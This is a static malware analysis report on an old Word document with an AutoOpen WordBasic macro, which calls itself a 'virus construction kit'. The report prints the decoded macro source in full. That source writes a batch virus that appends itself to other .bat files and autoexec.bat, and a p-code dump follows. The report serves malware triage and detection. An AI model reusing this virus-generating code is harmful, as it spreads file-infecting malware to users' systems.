Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0515fdc838f4e6f0…

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-04-12 20:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 0a11e409631b7c829057bdfe916bc9ac SHA-1: f0408ca24a0c610eaa651c6f1157620efb4f3d4e SHA-256: 0515fdc838f4e6f09e28c2f676dd560711057e33631f309ca93b94968ed336b5
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic macro that executes automatically upon opening (AutoOpen). The macro displays a dialog box to the user, prompting for input related to a virus name and path, and attempts to construct a batch file named 'c:\boot.bat'. This indicates a likely intent to download and execute a secondary payload or establish persistence.

Heuristics 4

  • ClamAV: Win.Tool.Macro-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Tool.Macro-18
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9290 bytes
SHA-256: 46d4eea5134c81f520ad67398a73905d05428b5190db1cbe58455dbb8d063a52
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
WordBasic.MsgBox "Mafia's Shit Creation Center v1.0b" + Chr(13) + _
"                   " + Chr(13) + _
"       (c) by XaRaBaS [DkpRJ]", "MSCC v1.0b"
WordBasic.BeginDialog 400, 150, "MSCC v1.0b   (c) XaRaBaS [DkpRJ]"
WordBasic.Text 10, 10, 300, 20, "Enter virus info and click OK"
WordBasic.Text 10, 40, 100, 50, "NaMe oF ThiS ShiT:"
WordBasic.TextBox 120, 40, 120, 17, "Ident$"
WordBasic.Text 10, 70, 100, 50, "Author:"
WordBasic.TextBox 120, 70, 120, 17, "Author$"
WordBasic.Text 10, 100, 100, 50, "TyPe HeRe ThE PaTh AnD ThE NaME Of ThE ViRuS:"
WordBasic.TextBox 120, 100, 240, 17, "Name$"
WordBasic.OKButton 270, 40, 90, 20
WordBasic.CancelButton 270, 70, 90, 20
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
dlg.Ident$ = "[DkpRJ]"
dlg.Author$ = "XaRaBaS 1999 [DkpRJ]"
dlg.Name$ = "c:\boot.bat"
On Error GoTo -1: On Error GoTo Clo
WordBasic.Dialog.UserDialog dlg
WordBasic.FileNew
WordBasic.Insert "@echo off %" + dlg.Ident$ + "%" + Chr(13) + Chr(10)
WordBasic.Insert "if -%1==-@ goto " + dlg.Ident$ + "z" + Chr(13) + Chr(10)
WordBasic.Insert "echo.>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%0>>" + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "for %%b in (*.bat) do call " + _
dlg.Ident$ + ".bat @ %%b" + Chr(13) + Chr(10)
WordBasic.Insert "del " + dlg.Ident$ + ".bat" + Chr(13) + Chr(10)
WordBasic.Insert "goto " + dlg.Ident$ + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + "z [SBVM 0.02d]" + Chr(13) + Chr(10)
WordBasic.Insert "if -%2==-autoexec.bat goto " + dlg.Ident$ + _
Chr(13) + Chr(10)
WordBasic.Insert "find " + Chr(34) + dlg.Ident$ + Chr(34) + _
"<%2>nul" + Chr(13) + Chr(10)
WordBasic.Insert "if errorlevel 1 type " + dlg.Ident$ + _
".bat>>%2" + Chr(13) + Chr(10)
WordBasic.Insert ":" + dlg.Ident$ + " by " + dlg.Author$
WordBasic.FileSaveAs Name:=dlg.Name$, Format:=4
WordBasic.FileClose (2)
WordBasic.MsgBox "A NeW ViRuS WaS CreAtED!!" + Chr(13) + _
"ThAnKs FoR UsInG MaFiA's ShIt CoStRuCtIon KiT", "MSCC v1.0b"
Clo:
End Sub


' Processing file: /opt/analyzer/scan_staging/889ab833b59d48ff80c962cf2f6f2492.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoOpen - 4323 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	LineCont 0x0008 0A 00 00 00 11 00 00 00
' 	LitStr 0x0022 "Mafia's Shit Creation Center v1.0b"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x0013 "                   "
' 	Add 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x001D "       (c) by XaRaBaS [DkpRJ]"
' 	Add 
' 	LitStr 0x000A "MSCC v1.0b"
' 	Ld WordBasic 
' 	ArgsMemCall MsgBox 0x0002 
' Line #3:
' 	LitDI2 0x0190 
' 	LitDI2 0x0096 
' 	LitStr 0x0020 "MSCC v1.0b   (c) XaRaBaS [DkpRJ]"
' 	Ld WordBasic 
' 	ArgsMemCall BeginDialog 0x0003 
' Line #4:
' 	LitDI2 0x000A 
' 	LitDI2 0x000A 
' 	LitDI2 0x012C 
' 	LitDI2 0x0014 
' 	LitStr 0x001D "Enter virus info and click OK"
' 	Ld WordBasic 
' 	ArgsMemCall Then 0x0005 
' Line #5:
' 	LitDI2 0x000A 
' 	LitDI2 0x0028 
' 	LitDI2 0x0064 
' 	LitDI2 0x0032 
' 	LitStr 0x0012 "NaMe oF ThiS ShiT:"
' 	Ld WordBasic 
' 	ArgsMemCall Then 0x0005 
' Line #6:
' 	LitDI2 0x0078 
' 	LitDI2 0x0028 
' 	LitDI2 0x0078 
' 	LitDI2 0x0011 
' 	LitStr 0x0006 "Ident$"
' 	Ld WordBasic 
' 	ArgsMemCall TextBox 0x0005 
' Line #7:
' 	LitDI2 0x000A 
' 	LitDI2 0x0046 
' 	LitDI2 0x0064 
' 	LitDI2 0x0032 
' 	LitStr 0x0007 "Author:"
' 	Ld WordBasic 
' 	ArgsMemCall Then 0x0005 
' Line #8:
' 	LitDI2 0x0078 
' 	LitDI2 0x0046 
' 	LitDI2 0x0078 
' 	LitDI2 0x0011 
' 	LitStr 0x0007 "Author$"
' 	Ld WordBasic 
' 	ArgsMemCall TextBox 0x0005 
' Lin
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.